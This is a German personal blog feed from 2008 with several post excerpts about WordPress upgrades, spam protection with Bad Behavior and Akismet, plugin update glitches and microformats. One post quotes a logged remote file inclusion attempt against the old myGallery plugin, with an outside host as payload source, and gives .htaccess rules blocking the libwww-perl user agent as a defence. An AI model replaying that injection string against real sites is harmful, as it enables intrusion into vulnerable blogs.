Wie dem auch war, seitdem arbeitete ich problemfrei mit der amerikanischen Originalversion, und seit eben in der ganz frischen Version 2.9! Das Update per eingebauter Automatik verlief schnell und reibungslos.

Der Speicherbedarf ist übrigens sogar weiter geschrumpft: von zuvor 85 Prozent auf nunmehr 79 Prozent. Das ist doch was!

Nur das lange von mir genutzte Tagging-Plugin Simple Tags funktioniert (zur Zeit) in der gegebenen Version nicht mehr, was mich nötigte, eben schnell in meinem Theme die bisherigen dem Plugin zugehörigen Template-Tags gegen die systemeigenen Varianten auszutauschen.
(Mehr zu Template Tags)

Und jetzt schaue ich mal, was sich so alles im Adminbereich geändert hat …

© Boris Stumpf - dyingeyes weblog 2004ff
Dieser Feed ist nur für die persönliche, nicht gewerbliche Nutzung bestimmt. Die Verwendung dieses Feeds auf kommerziellen Webseiten und/oder ohne Quellenangabe verstößt gegen die Lizenzbedingungen der Creative Commons License.
(Digitaler Fingerabdruck: 60c77d9e74d57f2299f42475f0e24778)

Das ist schön, auch wenn ich schon ahnte, wie diese Visualisierungen für mein Blögchen aussehen würden:

Wie jetzt das? Praktisch gar kein erkannter Kommentar­spam? Doch, klar! Bloß dass Bad Behavior nahezu aus­nahmslos alles abfängt, bevor Akismet überhaupt einschreiten kann.

Akismet stellt bei mir also den zweiten Schutzwall dar, hinter BB, das praktisch alle maro­dierenden Bots/Spider/Skripte (Spam, Injection, Adress­sammler usw.) kassiert, die entweder gemäß seiner Blacklist als Schädlinge erkannt und eingestuft sind oder sich Header-mäßig unge­bührlich verhalten. Unglaublich wirkungsvoll. Selten dringt mal ein Kommentar­spam-Versuch durch, den in aller Regel Akismet zuverlässig abfängt, so dass meine dritte Schutz­instanz, die manuelle Erst­kommentar-Moderation, nur ganz selten zum Einsatz kommt. Damit erwische ich die (selten auftretenden) müden Existenzen, die glauben, ihre arm­seligen werblichen Botschaften und SEO-Zwang­haftig­keiten per manueller Bespammung loswerden zu müssen.

Kommentare von:

• Pepino am 20.10.2008

© Boris Stumpf - dyingeyes weblog 2004ff
Dieser Feed ist nur für die persönliche, nicht gewerbliche Nutzung bestimmt. Die Verwendung dieses Feeds auf kommerziellen Webseiten und/oder ohne Quellenangabe verstößt gegen die Lizenzbedingungen der Creative Commons License.
(Digitaler Fingerabdruck: 60c77d9e74d57f2299f42475f0e24778)

/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sexery.de/prc.gif?

Das betreffende Plugin ist ein Galerie-Plugin für WordPress namens myGallery, es ist schon etwas älter und die Sicherheits­lücke betrifft zudem ältere Versionen (wohl vor 1.4b5), aber womöglich setzt es einer meiner Leser noch ein. Es scheint, dass da irgendein krimineller Idiot versucht, ältere und inzwischen womöglich vernach­lässigte Blogs in seinem Sinne zu »bearbeiten«.

Die Einschleusungsversuche kommen über wechselnde IP-Adressen, der User-Agent ist dagegen immer »libwww-perl/5.810«, eine freie Perl-Bibliothek, die – auch mit allen anderen Versions­nummern – zumindest mir bisher ausschließlich in Form von Hackversuchen, Spamversuchen und unin­teressanten Suchrobotern begegnet ist. Weswegen es gut ist, dass Bad Behavior Zugriffe dieser Agents anhand seiner ›Blacklist‹ (blacklist.inc.php) unabhängig von der anhängenden Versionsnummer blockiert.

Das kriminelle Skript geht übrigens nach dem Gießkannen-Prinzip vor, es versucht einfach flächen­deckend über das Anhängen des o.a. Plugin-Pfades, aber mit wechselnden anzu­hängenden Dateien, in Blogs einzudringen. Ich hatte myGallery nie im Einsatz.

Wer Bad Behavior nicht einsetzt, kann die User-Agents »libwww-perl« in seiner .htaccess generell blockieren:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl.*$
RewriteRule ^.* – [F]

Anmerkung: die ersten beiden Zeilen, das Initialisieren der Rewrite-Engine, kann man sich eventuell sparen, wenn diese schon an früherer Stelle in der .htaccess mit genau diesen Zeilen gestartet wurde. Was tatsächlich der Fall ist, wenn man die »sprechenden« Artikel-URLs eingeschaltet hat.

© Boris Stumpf - dyingeyes weblog 2004ff
Dieser Feed ist nur für die persönliche, nicht gewerbliche Nutzung bestimmt. Die Verwendung dieses Feeds auf kommerziellen Webseiten und/oder ohne Quellenangabe verstößt gegen die Lizenzbedingungen der Creative Commons License.
(Digitaler Fingerabdruck: 60c77d9e74d57f2299f42475f0e24778)

Ein kurzer Gegencheck mit meinem Test-Blog (da hatte ich bis vorhin noch BB 2.0.22 auf einem WP 2.5.1) zeigte, dass sie da noch vorhanden war. Nach einem Update auf die Version 2.0.23 war sie – schwupp – weg. Auch bei 2.0.24 bleibt sie weg. Lade ich wieder 2.0.22 hoch, ist sie wieder da.

Wenn ich versuche, diese Admin-Seite manuell per URL aufzurufen:

http://www.dieblogdomain.de/wp-admin/edit.php?page=bb2_manage

dann erhalte ich folgende Fehlermeldung:

»bb2_manage kann nicht geladen werden.«

Hat noch jemand von euch dieses Problem?
(Oder bin ich wieder einmal der einzige Dödel, der solche Probleme hat? Wie offenbar auch in Bezug auf mein nach wie vor ungelöstes Problem mit dem Aufruf des – leeren – ›Dashboards‹)

Kommentare von:

• kiesow am 1.10.2008
• myGallery-Hackversuche » dyingeyes weblog am 6.10.2008

© Boris Stumpf - dyingeyes weblog 2004ff
Dieser Feed ist nur für die persönliche, nicht gewerbliche Nutzung bestimmt. Die Verwendung dieses Feeds auf kommerziellen Webseiten und/oder ohne Quellenangabe verstößt gegen die Lizenzbedingungen der Creative Commons License.
(Digitaler Fingerabdruck: 60c77d9e74d57f2299f42475f0e24778)

Erst fühlte es sich nicht mehr genötigt, darauf hinzuweisen, welches Plugin genau in neuer Version verfügbar ist, sondern vermeldete schlicht an jeder geeigneten Stelle eine neue Version von »WP-Grins«. Die Versions­nummern dagegen bezogen sich auf das tatsächlich betroffene Plugin. Soweit war das noch erträglich.

Jetzt aber, mit dem soeben eingespielten Upgrade auf WordPress 2.6.1 vermeldet das System gleich mal zwei verfügbare Plugin-Updates:
»Simple Tags« soll ich von der installierten Version 1.5.7 auf die neue Version 1.5.7 erneuern …

… und das »WordPress Database Backup« soll ich von 2.1.5 auf 2.1.5 hochheben.

Fast überflüssig zu erwähnen, dass es gar keine neuen Versionen dieser Plugins gibt.

Da bin ich ja froh, dass ich nicht eben nach dem Upgrade auf 2.6.1 un­mittel­bar beim Aufruf des Adminbereichs darauf hingewiesen wurde, dass es eine neue WordPress-Version 2.6.1 gibt, die ich gleich installieren soll.

Update 20.08.08 gegen 9:46 Uhr:

Die beiden o.g. Plugins hat WP jetzt offenbar als aktuell eingestuft. Dagegen hat es inzwischen erkannt, dass mein »Akismet« von 2.1.6 auf das neue 2.1.6 aufgefrischt werden müsste.

© Boris Stumpf - dyingeyes weblog 2004ff
Dieser Feed ist nur für die persönliche, nicht gewerbliche Nutzung bestimmt. Die Verwendung dieses Feeds auf kommerziellen Webseiten und/oder ohne Quellenangabe verstößt gegen die Lizenzbedingungen der Creative Commons License.
(Digitaler Fingerabdruck: 60c77d9e74d57f2299f42475f0e24778)

Das wäre nicht nur zeitgemäß, sondern auch nützlich, denn man könnte auf diese Weise Veranstaltungstermine völlig unkompliziert in seinen (geeigneten) Terminplaner übernehmen.

Ein kurzer Blick vor meine Haustüre zeigte mir, dass auch das Frankfurter Webangebot in dieser Sache nichts zu bieten hat.

Es mag also tatsächlich so sein, dass derartig große Webangebote, mit derartig großen CMS von derartig großen Agenturen produziert, noch am Beginn des gewaltigen Sprunges von Broschüren-Holz zu WorldWideWeb sind und wir Nutzer da einfach geduldig sein müssen. Mit Inline-Links zu Fremd-Quellen in Informationstexten innerhalb dieser Webangebote hat man ja auch noch so seine Schwierigkeiten. Man kennt das übrigens auch von großen Zeitungen und Wochenmagazinen, die sich gerade vorsichtig im Web versuchen. Aber ich schweife ab …

Firefox, Operator und Mikroformate

Nils erwähnt die Firefox-Erweiterung »Operator«, die auf Webseiten oberflächlich verborgene mikroformatierte Daten ausfindig und bequem zugänglich macht. Das kann über eine zusätzliche Symbolleiste und/oder Hinweissymbole in der Firefox-Adresszeile bzw. der Statuszeile geschehen.

Nach der Installation der Erweiterung stellte ich sogleich höchst erfreut fest, dass sie auch vergebene Kategorien und Tags erkennt und hierzu jeweils weiterführende Links (zu Technorati, Amazon, Flickr, Upcoming, YouTube u.a.m.) anbietet. Ich kann aber im Moment noch nicht sagen, ob sich dieser Erkennungsvorgang auf WordPress-Blogs und womöglich das Plugin »Simple Tags« beschränkt, weil die Elemente dadurch entsprechend gekennzeichnet werden. Kurze Stichproben bei ein paar Nicht-Wordpress-Blogs zeigten jedenfalls, dass deren Kategorien und Tags nicht erkannt werden.

Hier sollte ich also noch etwas weiter forschen. Weitere Erkenntnisse teile ich bei Gelegenheit an dieser Stelle mit …

Update um 20:40 Uhr:

Das Mitteilen weiterer Erkenntnisse kann ich mir sparen, denn meine schlauen Leser wussten es schneller und besser als ich und ergänzten meine Ausführungen mit ihren Kommentaren …

Kommentare von:

• Eric Eggert am 4.8.2008
• Frank am 4.8.2008
• Sascha am 4.8.2008
• Nils am 4.8.2008
• Eric Eggert am 4.8.2008
• Boris (Autor) am 4.8.2008

© Boris Stumpf - dyingeyes weblog 2004ff
Dieser Feed ist nur für die persönliche, nicht gewerbliche Nutzung bestimmt. Die Verwendung dieses Feeds auf kommerziellen Webseiten und/oder ohne Quellenangabe verstößt gegen die Lizenzbedingungen der Creative Commons License.
(Digitaler Fingerabdruck: 60c77d9e74d57f2299f42475f0e24778)

Außer vielleicht, dass mir beim Betreten des Adminbereichs dieses Blögchens zuerst immer zwei zu aktualisierende Plugins angezeigt werden und nach dem Aufruf eines Unterbereichs, z.B. des Artikel-Editors, nur noch eins. Was der wirklichen Lage entspricht, denn im Moment habe ich bloß ein nicht-aktualisiertes Plugin, dessen neue Version irgendwie nicht richtig funktioniert.

Kommentare von:

• Webrocker am 25.7.2008
• oldman am 27.7.2008
• Rob Vegas am 29.7.2008

© Boris Stumpf - dyingeyes weblog 2004ff
Dieser Feed ist nur für die persönliche, nicht gewerbliche Nutzung bestimmt. Die Verwendung dieses Feeds auf kommerziellen Webseiten und/oder ohne Quellenangabe verstößt gegen die Lizenzbedingungen der Creative Commons License.
(Digitaler Fingerabdruck: 60c77d9e74d57f2299f42475f0e24778)